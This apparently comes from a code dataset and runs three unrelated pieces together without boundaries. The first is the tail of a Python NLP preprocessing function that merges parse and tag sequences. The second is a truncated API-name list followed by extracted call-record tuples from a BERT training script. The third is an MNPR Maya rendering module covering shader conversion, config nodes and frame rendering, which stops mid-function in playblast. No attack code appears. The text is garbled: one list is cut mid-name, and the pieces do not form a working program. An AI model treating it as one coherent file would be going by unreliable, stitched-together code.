        for ner_tag_a, ner_tag_b in zip(ner_tags_a, ner_tags_b):
            ner_tags.append(ner_tag_a + ['[SEP]'] + ner_tag_b)
        for dep_parse_token_a, dep_parse_token_b in zip(dep_parse_tokens_a, dep_parse_tokens_b):
            dep_parse_tokens.append(dep_parse_token_a + ['[SEP]'] + dep_parse_token_b)
        for dep_parse_a, dep_parse_b in zip(dep_parses_a, dep_parses_b):
            dep_parse.append(dep_parse_a + ['[SEP]'] + dep_parse_b)
        for const_parse_a, const_parse_b in zip(const_parses_a, const_parses_b):
            const_parse.append(const_parse_a + ['[SEP]'] + const_parse_b)
        for parse_tree_depth_a, parse_tree_depth_b in zip(parse_tree_depths_a, parse_tree_depths_b):
            parse_tree_depth.append(parse_tree_depth_a + ['[SEP]'] + parse_tree_depth_b)
    bad_sents_count = 0
    for i in range(len(all_ids)):
        try:
            # Length mismatches mark unparseable sentences; the asserts below
            # deliberately route them into the except branch.
            # NOTE: asserts are stripped under `python -O`.
            assert len(tokens[i]) == len(F_list[i]) == len(R_list[i]) == len(F_full[i]) == len(R_full[i])
            val_i = {'tokens': tokens[i], 'all_aFs': F_list[i], 'all_aRs': R_list[i], 'all_aFs_full': F_full[i], 'all_aRs_full': R_full[i]}
            if args.return_POS:
                assert len(pos_tags[i]) == len(tokens[i])
                val_i.update({'pos_tags': pos_tags[i]})
            if args.return_NER:
                assert len(ner_tags[i]) == len(tokens[i])
                val_i.update({'ner_tags': ner_tags[i]})
            if args.return_DEP:
                assert len(dep_parse_tokens[i]) == len(dep_parse[i])
                val_i.update({'dep_parse_tokens': dep_parse_tokens[i],'dep_edge': dep_parse[i]})
            if args.return_CONST:
                assert len(const_parse[i]) == len(tokens[i])
                val_i.update({'const_parse_path': const_parse[i]})
                assert len(parse_tree_depth[i]) == len(tokens[i])
                val_i.update({'tree_depth': parse_tree_depth[i]})
            values[all_ids[i]] = val_i
        except Exception:
            # Was a bare `except:`; narrowed so KeyboardInterrupt/SystemExit
            # are no longer silently swallowed.
            bad_sents_count += 1
    logger.info('Could not parse {:.2f}% of the sentences out of all {} data points'.format(bad_sents_count/ len(all_ids)*100, len(all_ids)))
    return values
"torch.utils.data.distributed.DistributedSampler",
"modules.model.BertForSequenceClassification_tpr",
"torch.distributed.get_world_size",
"torch.optim.SGD",
"torch.utils.data.SequentialSampler",
"torch.utils.data.TensorDataset",
"utils.data_utils.logger.info",
"transformers.optimization.WarmupLinearSc... | [((883, 916), 'os.path.join', 'os.path.join', (['args.data_dir', 'task'], {}), '(args.data_dir, task)\n', (895, 916), False, 'import os\n'), ((1246, 1425), 'utils.data_utils.convert_examples_to_features', 'convert_examples_to_features', (['examples', 'label_list', 'args.max_seq_length', 'tokenizer', 'single_sentence', 'return_pos_tags', 'return_ner_tags', 'return_dep_parse', 'return_const_parse'], {}), '(examples, label_list, args.max_seq_length,\n tokenizer, single_sentence, return_pos_tags, return_ner_tags,\n return_dep_parse, return_const_parse)\n', (1274, 1425), False, 'from utils.data_utils import convert_examples_to_features, logger\n'), ((1571, 1612), 'utils.data_utils.logger.info', 'logger.info', (['"""***** preparing data *****"""'], {}), "('***** preparing data *****')\n", (1582, 1612), False, 'from utils.data_utils import convert_examples_to_features, logger\n'), ((1756, 1800), 'utils.data_utils.logger.info', 'logger.info', (['""" Batch size = %d"""', 'batch_size'], {}), "(' Batch size = %d', batch_size)\n", (1767, 1800), False, 'from utils.data_utils import convert_examples_to_features, logger\n'), ((1821, 1884), 'torch.tensor', 'torch.tensor', (['[f.input_ids for f in features]'], {'dtype': 'torch.long'}), '([f.input_ids for f in features], dtype=torch.long)\n', (1833, 1884), False, 'import torch\n'), ((1906, 1971), 'torch.tensor', 'torch.tensor', (['[f.input_mask for f in features]'], {'dtype': 'torch.uint8'}), '([f.input_mask for f in features], dtype=torch.uint8)\n', (1918, 1971), False, 'import torch\n'), ((1994, 2059), 'torch.tensor', 'torch.tensor', (['[f.segment_ids for f in features]'], {'dtype': 'torch.long'}), '([f.segment_ids for f in features], dtype=torch.long)\n', (2006, 2059), False, 'import torch\n'), ((2085, 2154), 'torch.tensor', 'torch.tensor', (['[f.sub_word_masks for f in features]'], {'dtype': 'torch.uint8'}), '([f.sub_word_masks for f in features], dtype=torch.uint8)\n', (2097, 
2154), False, 'import torch\n'), ((2184, 2255), 'torch.tensor', 'torch.tensor', (['[f.orig_to_token_map for f in features]'], {'dtype': 'torch.long'}), '([f.orig_to_token_map for f in features], dtype=torch.long)\n', (2196, 2255), False, 'import torch\n'), ((3367, 3423), 'torch.utils.data.DataLoader', 'DataLoader', (['data'], {'sampler': 'sampler', 'batch_size': 'batch_size'}), '(data, sampler=sampler, batch_size=batch_size)\n', (3377, 3423), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((5855, 6024), 'modules.model.BertForSequenceClassification_tpr', 'BertForSequenceClassification_tpr', (['bert_config'], {'num_labels': 'num_labels', 'task_type': 'task_type', 'temperature': 'args.temperature', 'max_seq_len': 'args.max_seq_length'}), '(bert_config, num_labels=num_labels,\n task_type=task_type, temperature=args.temperature, max_seq_len=args.\n max_seq_length, **opt)\n', (5888, 6024), False, 'from modules.model import BertForSequenceClassification_tpr\n'), ((2937, 3061), 'torch.utils.data.TensorDataset', 'TensorDataset', (['all_input_ids', 'all_input_mask', 'all_segment_ids', 'all_sub_word_masks', 'all_orig_to_token_maps', 'all_label_ids'], {}), '(all_input_ids, all_input_mask, all_segment_ids,\n all_sub_word_masks, all_orig_to_token_maps, all_label_ids)\n', (2950, 3061), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((3282, 3305), 'torch.utils.data.SequentialSampler', 'SequentialSampler', (['data'], {}), '(data)\n', (3299, 3305), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((4344, 4452), 'apex.optimizers.FusedAdam', 'FusedAdam', (['optimizer_grouped_parameters'], {'lr': 'args.learning_rate', 'bias_correction': '(False)', 'max_grad_norm': '(1.0)'}), '(optimizer_grouped_parameters, lr=args.learning_rate,\n bias_correction=False, max_grad_norm=1.0)\n', (4353, 4452), False, 'from apex.optimizers import 
FusedAdam\n'), ((6591, 6617), 'os.path.join', 'os.path.join', (['loading_path'], {}), '(loading_path)\n', (6603, 6617), False, 'import os\n'), ((6635, 6685), 'torch.load', 'torch.load', (['output_model_file'], {'map_location': 'device'}), '(output_model_file, map_location=device)\n', (6645, 6685), False, 'import torch\n'), ((10679, 10689), 'apex.parallel.DistributedDataParallel', 'DDP', (['model'], {}), '(model)\n', (10682, 10689), True, 'from apex.parallel import DistributedDataParallel as DDP\n'), ((2344, 2406), 'torch.tensor', 'torch.tensor', (['[f.label_id for f in features]'], {'dtype': 'torch.long'}), '([f.label_id for f in features], dtype=torch.long)\n', (2356, 2406), False, 'import torch\n'), ((2426, 2550), 'torch.utils.data.TensorDataset', 'TensorDataset', (['all_input_ids', 'all_input_mask', 'all_segment_ids', 'all_sub_word_masks', 'all_orig_to_token_maps', 'all_label_ids'], {}), '(all_input_ids, all_input_mask, all_segment_ids,\n all_sub_word_masks, all_orig_to_token_maps, all_label_ids)\n', (2439, 2550), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((2580, 2689), 'torch.utils.data.TensorDataset', 'TensorDataset', (['all_input_ids', 'all_input_mask', 'all_segment_ids', 'all_sub_word_masks', 'all_orig_to_token_maps'], {}), '(all_input_ids, all_input_mask, all_segment_ids,\n all_sub_word_masks, all_orig_to_token_maps)\n', (2593, 2689), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((2751, 2813), 'torch.tensor', 'torch.tensor', (['[f.label_id for f in features]'], {'dtype': 'torch.long'}), '([f.label_id for f in features], dtype=torch.long)\n', (2763, 2813), False, 'import torch\n'), ((2856, 2921), 'torch.tensor', 'torch.tensor', (['[f.label_id for f in features]'], {'dtype': 'torch.float32'}), '([f.label_id for f in features], dtype=torch.float32)\n', (2868, 2921), False, 'import torch\n'), ((3173, 3192), 'torch.utils.data.RandomSampler', 
'RandomSampler', (['data'], {}), '(data)\n', (3186, 3192), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((3229, 3253), 'torch.utils.data.distributed.DistributedSampler', 'DistributedSampler', (['data'], {}), '(data)\n', (3247, 3253), False, 'from torch.utils.data.distributed import DistributedSampler\n'), ((3976, 4010), 'torch.distributed.get_world_size', 'torch.distributed.get_world_size', ([], {}), '()\n', (4008, 4010), False, 'import torch\n'), ((4596, 4646), 'apex.optimizers.FP16_Optimizer', 'FP16_Optimizer', (['optimizer'], {'dynamic_loss_scale': '(True)'}), '(optimizer, dynamic_loss_scale=True)\n', (4610, 4646), False, 'from apex.optimizers import FP16_Optimizer\n'), ((4685, 4745), 'apex.optimizers.FP16_Optimizer', 'FP16_Optimizer', (['optimizer'], {'static_loss_scale': 'args.loss_scale'}), '(optimizer, static_loss_scale=args.loss_scale)\n', (4699, 4745), False, 'from apex.optimizers import FP16_Optimizer\n'), ((4818, 4896), 'transformers.optimization.AdamW', 'AdamW', (['optimizer_grouped_parameters'], {'lr': 'args.learning_rate', 'correct_bias': '(False)'}), '(optimizer_grouped_parameters, lr=args.learning_rate, correct_bias=False)\n', (4823, 4896), False, 'from transformers.optimization import AdamW, WarmupLinearSchedule\n'), ((4987, 5086), 'transformers.optimization.WarmupLinearSchedule', 'WarmupLinearSchedule', (['optimizer'], {'warmup_steps': '(args.warmup_proportion * t_total)', 't_total': 't_total'}), '(optimizer, warmup_steps=args.warmup_proportion *\n t_total, t_total=t_total)\n', (5007, 5086), False, 'from transformers.optimization import AdamW, WarmupLinearSchedule\n'), ((6898, 6948), 'utils.data_utils.logger.info', 'logger.info', (['"""loading roles from checkpoint model"""'], {}), "('loading roles from checkpoint model')\n", (6909, 6948), False, 'from utils.data_utils import convert_examples_to_features, logger\n'), ((7056, 7108), 'utils.data_utils.logger.info', 'logger.info', (['"""loading 
fillers from checkpoint model"""'], {}), "('loading fillers from checkpoint model')\n", (7067, 7108), False, 'from utils.data_utils import convert_examples_to_features, logger\n'), ((7223, 7282), 'utils.data_utils.logger.info', 'logger.info', (['"""loading role selectors from checkpoint model"""'], {}), "('loading role selectors from checkpoint model')\n", (7234, 7282), False, 'from utils.data_utils import convert_examples_to_features, logger\n'), ((7513, 7574), 'utils.data_utils.logger.info', 'logger.info', (['"""loading filler selectors from checkpoint model"""'], {}), "('loading filler selectors from checkpoint model')\n", (7524, 7574), False, 'from utils.data_utils import convert_examples_to_features, logger\n'), ((7801, 7857), 'utils.data_utils.logger.info', 'logger.info', (['"""loading bert params from checkpoint model"""'], {}), "('loading bert params from checkpoint model')\n", (7812, 7857), False, 'from utils.data_utils import convert_examples_to_features, logger\n'), ((8006, 8068), 'utils.data_utils.logger.info', 'logger.info', (['"""loading classifier params from checkpoint model"""'], {}), "('loading classifier params from checkpoint model')\n", (8017, 8068), False, 'from utils.data_utils import convert_examples_to_features, logger\n'), ((8224, 8280), 'utils.data_utils.logger.info', 'logger.info', (['"""loading LSTM params from checkpoint model"""'], {}), "('loading LSTM params from checkpoint model')\n", (8235, 8280), False, 'from utils.data_utils import convert_examples_to_features, logger\n'), ((8651, 8706), 'utils.data_utils.logger.info', 'logger.info', (['"""freezing roles if loaded from ckpt model"""'], {}), "('freezing roles if loaded from ckpt model')\n", (8662, 8706), False, 'from utils.data_utils import convert_examples_to_features, logger\n'), ((8815, 8872), 'utils.data_utils.logger.info', 'logger.info', (['"""freezing fillers if loaded from ckpt model"""'], {}), "('freezing fillers if loaded from ckpt model')\n", (8826, 8872), False, 'from 
utils.data_utils import convert_examples_to_features, logger\n'), ((8988, 9052), 'utils.data_utils.logger.info', 'logger.info', (['"""freezing role selectors if loaded from ckpt model"""'], {}), "('freezing role selectors if loaded from ckpt model')\n", (8999, 9052), False, 'from utils.data_utils import convert_examples_to_features, logger\n'), ((9283, 9349), 'utils.data_utils.logger.info', 'logger.info', (['"""freezing filler selectors if loaded from ckpt model"""'], {}), "('freezing filler selectors if loaded from ckpt model')\n", (9294, 9349), False, 'from utils.data_utils import convert_examples_to_features, logger\n'), ((9576, 9637), 'utils.data_utils.logger.info', 'logger.info', (['"""freezing bert params if loaded from ckpt model"""'], {}), "('freezing bert params if loaded from ckpt model')\n", (9587, 9637), False, 'from utils.data_utils import convert_examples_to_features, logger\n'), ((9787, 9854), 'utils.data_utils.logger.info', 'logger.info', (['"""freezing classifier params if loaded from ckpt model"""'], {}), "('freezing classifier params if loaded from ckpt model')\n", (9798, 9854), False, 'from utils.data_utils import convert_examples_to_features, logger\n'), ((10011, 10072), 'utils.data_utils.logger.info', 'logger.info', (['"""freezing LSTM params if loaded from ckpt model"""'], {}), "('freezing LSTM params if loaded from ckpt model')\n", (10022, 10072), False, 'from utils.data_utils import convert_examples_to_features, logger\n'), ((10726, 10754), 'torch.nn.DataParallel', 'torch.nn.DataParallel', (['model'], {}), '(model)\n', (10747, 10754), False, 'import torch\n'), ((5309, 5365), 'torch.optim.SGD', 'SGD', (['optimizer_grouped_parameters'], {'lr': 'args.learning_rate'}), '(optimizer_grouped_parameters, lr=args.learning_rate)\n', (5312, 5365), False, 'from torch.optim import SGD\n')] |
"""
@license: MIT
@repository: https://github.com/semontesdeoca/MNPR
_
_ __ ___ _ __ _ __ _ __ ___ _ _ ___| |_ ___ _ __ ___
| '_ ` _ \| '_ \| '_ \| '__| / __| | | / __| __/ _ \ '_ ` _ \
| | | | | | | | | |_) | | \__ \ |_| \__ \ || __/ | | | | |
|_| |_| |_|_| |_| .__/|_| |___/\__, |___/\__\___|_| |_| |_|
|_| |___/
@summary: MNPR related functions
"""
from __future__ import print_function
import os
import traceback
import maya.cmds as cmds
import maya.mel as mel
import coopLib as lib
import mnpr_info
import mnpr_runner
import mnpr_matPresets
mnpr_info.loadPlugin()  # ensure the MNPR plugin is loaded before anything else in this module runs

# Translation table from the legacy dx11Shader attribute names (all prefixed
# with "x") to their counterparts on the ShaderFX-based MNPR materials.
# An empty string means the attribute has no ShaderFX counterpart and is
# skipped during conversion (see dx112sfx()).
dx2sfxAttr = {"xUseColorTexture": "Albedo_Texture",
              "xColorTint": "Color_Tint",
              "xUseNormalTexture": "Normal_Map",
              "xFlipU": "Invert_U",
              "xFlipV": "Invert_V",
              "xBumpDepth": "Bump_Depth",
              "xUseSpecularTexture": "Specular_Map",
              "xSpecular": "Specular_Roll_Off",
              "xSpecDiffusion": "Specular_Diffusion",
              "xSpecTransparency": "Specular_Transparency",
              "xUseShadows": "",
              "xShadowDepthBias": "",
              "xDiffuseFactor": "Diffuse_Factor",
              "xShadeColor": "Shade_Color",
              "xShadeWrap": "Shade_Wrap",
              "xUseOverrideShade": "Shade_Override",
              "xDilute": "Dilute_Paint",
              "xCangiante": "Cangiante",
              "xDiluteArea": "Dilute_Area",
              "xHighArea": "Highlight_Roll_Off",
              "xHighTransparency": "Highlight_Transparency",
              "xAtmosphereColor": "",
              "xRangeStart": "",
              "xRangeEnd": "",
              "xDarkEdges": "",
              "xMainTex": "Albedo_Texture_File",
              "xNormalTex": "Normal_Map_File",
              "xSpecTex": "Specular_Map_File"
              }
def check():
    """Makes sure everything is running right before working with MNPR.

    Verifies the active viewport, loads the renderer and required 3rd-party
    plugins, sets the viewport renderer override and guarantees that a
    configuration node exists in the scene.
    """
    print("SYSTEM CHECK FOR {0}".format(mnpr_info.prototype))
    # check viewport and make sure it displays textures
    viewport = lib.getActiveModelPanel()
    cmds.modelEditor(viewport, dtx=True, e=True)  # display textures
    # plugin needs to be loaded
    mnpr_info.loadRenderer()
    # 3rd party plugins must be loaded
    cmds.loadPlugin('shaderFXPlugin', quiet=True)
    if cmds.about(nt=True, q=True):
        # Windows-only legacy shader plugins
        cmds.loadPlugin('dx11Shader', quiet=True)  # deprecated (only shaderFXPlugin in the future)
        cmds.loadPlugin('glslShader', quiet=True)  # deprecated (only shaderFXPlugin in the future)
    # viewport renderer must be set to the MNPR override
    mel.eval("setRendererAndOverrideInModelPanel vp2Renderer {0} {1};".format(mnpr_info.prototype, viewport))
    # modify color of heads up display so it stays readable
    cmds.displayColor("headsUpDisplayLabels", 2, dormant=True)
    cmds.displayColor("headsUpDisplayValues", 2, dormant=True)
    # make sure a config node exists; restore the previous selection afterwards
    if not cmds.objExists(mnpr_info.configNode):
        selected = cmds.ls(sl=True, l=True)
        selectConfig()
        cmds.select(selected, r=True)
    lib.printInfo("-> SYSTEM CHECK SUCCESSFUL")
def changeStyle():
    """Resets MNPR to load a new style.

    Deletes the current stylization and configuration node, re-registers the
    renderer node, creates a fresh config node and rebuilds any open MNPR UIs
    so they reflect the new style. The order of operations matters here.
    """
    # reset stylization
    cmds.mnpr(resetStylization=True)
    # delete old config node
    if cmds.objExists(mnpr_info.configNode):
        cmds.delete(mnpr_info.configNode)
    # flush undo so no stale node references survive in the undo queue
    cmds.flushUndo()
    print("style deleted")
    # deregister node
    cmds.mnpr(rn=False)
    # register node
    cmds.mnpr(rn=True)
    # create new config node
    selectConfig()
    # refresh AETemplate
    mnpr_runner.reloadConfig()
    # set new media type
    mnpr_info.media = cmds.mnpr(style=True, q=True)
    # rebuild opened UI's (imported lazily to avoid a circular import at module load)
    import mnpr_UIs
    if cmds.window(mnpr_UIs.BreakdownUI.windowTitle, exists=True):
        mnpr_runner.openOverrideSettings(rebuild=True)
    import mnpr_FX
    if cmds.window(mnpr_FX.MNPR_FX_UI.windowTitle, exists=True):
        mnpr_runner.openPaintFX(rebuild=True)
    lib.printInfo("Style changed")
def togglePlugin(force=""):
    """
    Toggles the active plugin prototype, or force-loads a desired one.

    Args:
        force (str): plugin prototype name to force (optional)
    """
    if force:
        # swap to the requested prototype: unload the current one first
        unloadPlugin(mnpr_info.prototype)
        mnpr_info.prototype = force
        check()
        return
    # nothing forced -> toggle whatever is currently active
    currently_loaded = cmds.pluginInfo(mnpr_info.prototype, loaded=True, q=True)
    if currently_loaded:
        unloadPlugin(mnpr_info.prototype)
    else:
        check()
def unloadPlugin(plugin):
    """
    Unloads the plugin and cleans the scene from its traces.

    Args:
        plugin (str): name of the plugin to be unloaded
    """
    if not cmds.pluginInfo(plugin, loaded=True, q=True):
        return  # plugin is not loaded, nothing to clean up
    # remove the configuration node before the plugin that owns its type goes away
    if cmds.objExists(mnpr_info.configNode):
        cmds.delete(mnpr_info.configNode)  # delete config node
    cmds.flushUndo()  # clear undo queue so no stale node references remain
    cmds.unloadPlugin(plugin)
    lib.printInfo("->PLUGIN SUCCESSFULLY UNLOADED")
def showShaderAttr():
    """Select the material of the current selection and show it in the attribute editor."""
    if not cmds.ls(sl=True):
        cmds.warning("Select object with shader")
        return
    cmds.hyperShade(smn=True)   # select the materials of the current selection
    mel.eval("openAEWindow")    # pop the attribute editor
def refreshShaders():
    """Re-points all object-space plugin shaders to the shader files on disk.

    Returns:
        (bool): True when done
    """
    shader_dir = systemDir("shaders")
    if os.name == 'nt' and mnpr_info.backend == 'dx11':
        # DirectX 11 backend (Windows only); fall back to the compiled .fxo
        shader_path = os.path.join(shader_dir, "PrototypeC.fx")
        if not os.path.isfile(shader_path):
            shader_path = os.path.join(shader_dir, "prototypeC.fxo")
        shader_nodes = cmds.ls(type="dx11Shader")
    else:
        # OpenGL backend
        shader_path = os.path.join(shader_dir, "PrototypeC.ogsfx")
        shader_nodes = cmds.ls(type="GLSLShader")
    for node in shader_nodes:
        cmds.setAttr("{0}.shader".format(node), shader_path, type="string")
    lib.printInfo('Shaders refreshed')
    return True
def updateShaderFX():
    """Updates every ShaderFX material in the scene to its latest graph version."""
    shader_dir = systemDir("shaders")
    materials = cmds.ls(type="ShaderfxShader")
    updated = 0
    for mat in materials:
        updated += 1
        # remember the current attribute values of the material
        mat_attrs = {}
        mnpr_matPresets.getMaterialAttrs(mat, mat_attrs)
        # reload the latest graph of the same type
        graph_file = os.path.join(shader_dir, "{0}.sfx".format(mat_attrs["graph"]))
        cmds.shaderfx(sfxnode=mat, loadGraph=graph_file)
        # restore the remembered attribute values onto the fresh graph
        mnpr_matPresets.setMaterialAttrs(mat, mat_attrs)
        print("{0} has been updated to the latest version".format(mat))
    print("{0}/{1} materials updated".format(updated, len(materials)))
    lib.printInfo('Shaders updated')
def dx112glsl():
    """Converts every dx11Shader material in the scene to a GLSLShader material.

    For each dx11Shader: copies its "x"-prefixed custom attributes, re-assigns
    its shapes, re-connects its file texture nodes and sets the vertex control
    set sources. The original dx11 shader is intentionally left in the scene
    (see the commented-out delete at the bottom).
    """
    check()
    dx11Shaders = cmds.ls(type="dx11Shader")
    print(dx11Shaders)
    for dx11Shader in dx11Shaders:
        print("Transfering {0} shader".format(dx11Shader))
        # get all custom ("x"-prefixed) keyable attributes
        attributes = cmds.listAttr(dx11Shader, ud=True, st="x*", k=True)
        print(attributes)
        # get all connected file nodes as [destPlug, srcPlug, ...] pairs
        connectedNodes = cmds.listConnections(dx11Shader, t="file", c=True, p=True)
        print(connectedNodes)
        # get all shapes assigned to this shader
        cmds.select(dx11Shader, r=True)
        cmds.hyperShade(objects="")
        shapes = cmds.ls(sl=True)
        print(shapes)
        # create glsl shader and assign it to the same shapes
        shader = cmds.shadingNode('GLSLShader', asShader=True, n="{0}_GL".format(dx11Shader))
        cmds.select(shapes, r=True)
        cmds.hyperShade(assign=shader)
        print(">>> Shader {0} created".format(shader))
        # point the new shader at the OpenGL shader file
        shaderFile = os.path.join(mnpr_info.environment,"shaders","PrototypeC.ogsfx")
        cmds.setAttr("{0}.shader".format(shader), shaderFile, type="string")
        print("Setting attributes for {0}".format(shader))
        for attr in attributes:
            value = cmds.getAttr("{0}.{1}".format(dx11Shader, attr))
            try:
                if type(value) == type([]):
                    # compound attributes come back as [(x, y, z)]
                    cmds.setAttr("{0}.{1}".format(shader, attr), value[0][0], value[0][1], value[0][2], typ="double3")
                else:
                    cmds.setAttr("{0}.{1}".format(shader, attr), value)
            except:
                # best-effort copy: some attributes may not exist on the GLSL shader
                print("Found problemt when setting {0}.{1}, skipping for now".format(shader, attr))
        # re-connect file texture nodes (pairs of destination/source plugs)
        if connectedNodes:
            for i in range(0, len(connectedNodes), 2):
                inputAttr = connectedNodes[i].split(".")[1]
                cmds.connectAttr(connectedNodes[i+1], "{0}.{1}".format(shader, inputAttr))
        # set vertex control set sources (only when the attribute exists)
        if cmds.attributeQuery("Color0_Source", node=shader, ex=True):
            cmds.setAttr("{0}.Color0_Source".format(shader), "color:controlSetA", type="string" )
        if cmds.attributeQuery("Color1_Source", node=shader, ex=True):
            cmds.setAttr("{0}.Color1_Source".format(shader), "color:controlSetB", type="string" )
        if cmds.attributeQuery("Color2_Source", node=shader, ex=True):
            cmds.setAttr("{0}.Color2_Source".format(shader), "color:controlSetC", type="string" )
        # delete dx11 shader
        #cmds.delete(dx11Shader)
def dx112sfx(graph="mnpr_uber"):
    """
    Converts legacy dx11 PrototypeC materials to ShaderFX materials.

    Only dx11Shader nodes whose shader path contains "rototypeC" are
    converted; their attributes are mapped through the module-level
    dx2sfxAttr table and the originals are deleted at the end.

    Args:
        graph (str): ShaderFX graph name (filename, without extension)
    """
    check()
    dx11Shaders = cmds.ls(type="dx11Shader")
    prototypeCNodes = []
    for dx11Shader in dx11Shaders:
        shaderPath = cmds.getAttr("{0}.shader".format(dx11Shader))
        # substring match covers both "PrototypeC" and "prototypeC" spellings
        if "rototypeC" not in shaderPath:
            continue
        prototypeCNodes.append(dx11Shader)
        print("Converting {0} shader".format(dx11Shader))
        # get all custom ("x"-prefixed) keyable attributes
        attributes = cmds.listAttr(dx11Shader, ud=True, st="x*", k=True)
        print(attributes)
        # get all connected file nodes as [destPlug, srcNode, ...] pairs
        connectedNodes = cmds.listConnections(dx11Shader, t="file", c=True)
        print(connectedNodes)
        # get all shapes assigned to this shader
        cmds.select(dx11Shader, r=True)
        cmds.hyperShade(objects="")
        shapes = cmds.ls(sl=True)
        print(shapes)
        # create shaderFX shader and assign it to the same shapes
        shader = cmds.shadingNode('ShaderfxShader', asShader=True, name="{0}".format(dx11Shader.replace("_WC", "_SFX")))
        cmds.select(shapes, r=True)
        cmds.hyperShade(assign=shader)
        shaderFile = os.path.join(mnpr_info.environment, "shaders", "{0}.sfx".format(graph))
        cmds.shaderfx(sfxnode=shader, loadGraph=shaderFile)
        print(">>> Shader {0} created".format(shader))
        # toggle the matching graph switches from the legacy boolean settings
        vtxControl = bool(cmds.getAttr("{0}.{1}".format(dx11Shader, "xUseControl")))
        if vtxControl:
            nodeId = cmds.shaderfx(sfxnode=shader, getNodeIDByName="vtxControls")
            cmds.shaderfx(sfxnode=shader, edit_bool=(nodeId, "value", vtxControl))
        shadows = bool(cmds.getAttr("{0}.{1}".format(dx11Shader, "xUseShadows")))
        if not shadows:
            nodeId = cmds.shaderfx(sfxnode=shader, getNodeIDByName="Shadow")
            cmds.shaderfx(sfxnode=shader, edit_bool=(nodeId, "value", shadows))
        specularity = bool(cmds.getAttr("{0}.{1}".format(dx11Shader, "xSpecular")))
        if specularity:
            nodeId = cmds.shaderfx(sfxnode=shader, getNodeIDByName="Specularity")
            cmds.shaderfx(sfxnode=shader, edit_bool=(nodeId, "value", specularity))
        # copy attribute values through the dx11 -> ShaderFX name mapping
        print("Setting attributes for {0}".format(shader))
        for attr in attributes:
            value = cmds.getAttr("{0}.{1}".format(dx11Shader, attr))
            if attr in dx2sfxAttr:
                lib.setAttr(shader, dx2sfxAttr[attr], value)
        # transfer texture file paths onto the mapped file attributes
        if connectedNodes:
            for i in range(0, len(connectedNodes), 2):
                textureDir = cmds.getAttr("{0}.{1}".format(connectedNodes[i+1], "fileTextureName"))
                attr = connectedNodes[i].split(".")[1]
                lib.setAttr(shader, dx2sfxAttr[attr], textureDir)
    # delete prototypeC shaders
    cmds.delete(prototypeCNodes)
def systemDir(folder=''):
    """
    Returns the MNPR system directory, optionally extended by a sub-folder.

    Args:
        folder (str): folder to append to the system directory

    Returns:
        (str): path to the (sub-)directory
    """
    # the system root is one level above the directory containing this module
    this_file = os.path.realpath(__file__)
    root_dir = os.path.dirname(os.path.dirname(this_file))
    return os.path.join(root_dir, folder)
def selectConfig():
    """Selects the configuration node, creating and connecting it first if needed."""
    # delete legacy configuration nodes from older versions
    if cmds.objExists("NPRConfig"):
        cmds.delete("NPRConfig")
    if not cmds.objExists(mnpr_info.configNode):
        print(mnpr_info.configNode)
        cmds.createNode("mnprConfig", n=mnpr_info.configNode)
        # connect to the persp camera so the config node is evaluated each refresh
        cmds.connectAttr("{0}.evaluate".format(mnpr_info.configNode), "persp.visibility", f=True)
        mel.eval("AttributeEditor")
        lib.printInfo("-> CONFIG NODE CREATED AND CONNECTED")
    else:
        cmds.select(mnpr_info.configNode)
        mel.eval("AttributeEditor")
        lib.printInfo("Selected {0} configuration node".format(mnpr_info.prototype))
def optimizePerformance():
    """Optimizes performance by disabling some Maya functions.

    Currently this only switches animation evaluation back to legacy DG
    (dependency graph) mode, disabling the parallel evaluation manager.
    """
    cmds.evaluationManager(mode="off")  # set up animation evaluation to DG
def renderFrame(saveDir, width, height, renderSize=1, imgFormat=".jpg", override=mnpr_info.prototype):
    """
    Renders the current frame in the viewport.

    Args:
        saveDir (str): save directory
        width (int): width in pixels
        height (int): height in pixels
        renderSize (float): render size (factor)
        imgFormat (str): image format (".jpg", ".exr", etc.)
        override (str): name of desired override (if any)

    Returns:
        (str): path of the captured image, or "" if the capture failed
               or was canceled by the user
    """
    check()  # check that everything is in order
    renderSize = resolutionCheck(width, height, renderSize)  # make sure resolution is reasonable
    # get working values so they can be restored afterwards
    workingRenderSize = cmds.getAttr("{0}.renderScale".format(mnpr_info.configNode))
    workingColorDepth = cmds.getAttr("{0}.colorDepth".format(mnpr_info.configNode))
    # set desired attributes
    if workingColorDepth != 2:
        lib.setAttr(mnpr_info.configNode, "colorDepth", 2)
    if renderSize != workingRenderSize:
        lib.setAttr(mnpr_info.configNode, "renderScale", renderSize)
    # prepare renderer
    cmds.mnpr(g=True)  # enable mnprGamma
    mnprOperations = len(cmds.mnpr(lsO=True))
    cmds.mnpr(renderOperation=mnprOperations-1, s=0)  # HUD
    cmds.mnpr(renderOperation=mnprOperations-2, s=0)  # UI
    cmds.refresh()
    # render frame
    # BUGFIX: initialized so a failed/canceled capture doesn't raise NameError below
    screenshotPath = ""
    try:
        screenshotPath = lib.screenshot(saveDir, width, height, format=imgFormat, override=override)  # render the frame
    except OSError:
        # WindowsError (user canceled the save dialog) is a subclass of OSError;
        # catching OSError also keeps this clause valid on non-Windows platforms
        print("Screenshot saving has been canceled")
    except:
        traceback.print_exc()
    finally:
        # always bring the renderer and config node back to their working
        # state, even when the capture failed or was canceled
        cmds.mnpr(renderOperation=mnprOperations-1, s=1)  # HUD
        cmds.mnpr(renderOperation=mnprOperations-2, s=1)  # UI
        lib.setAttr(mnpr_info.configNode, "renderScale", workingRenderSize)
        lib.setAttr(mnpr_info.configNode, "colorDepth", workingColorDepth)
        cmds.mnpr(g=False)
        cmds.refresh()
    return screenshotPath
def playblast(saveDir, width, height, renderCamera, modelPanel, renderSize=1):
    """
    Playblasts the time slider through MNPR.

    Args:
        saveDir (str): save directory with *.mov extension
        width (int): width in pixels
        height (int): height in pixels
        renderCamera (str): camera to playblast from
        modelPanel (str): modelPanel to playblast from
        renderSize (float): render size (factor)
    """
    check()  # check that everything is in order
    renderSize = resolutionCheck(width, height, renderSize)  # make sure resolution is reasonable
    aPlayBackSliderPython = mel.eval('$tmpVar=$gPlayBackSlider')
    audioNode = cmds.timeControl(aPlayBackSliderPython, q=True, s=True)  # get audio node
    # get working values so they can be restored afterwards
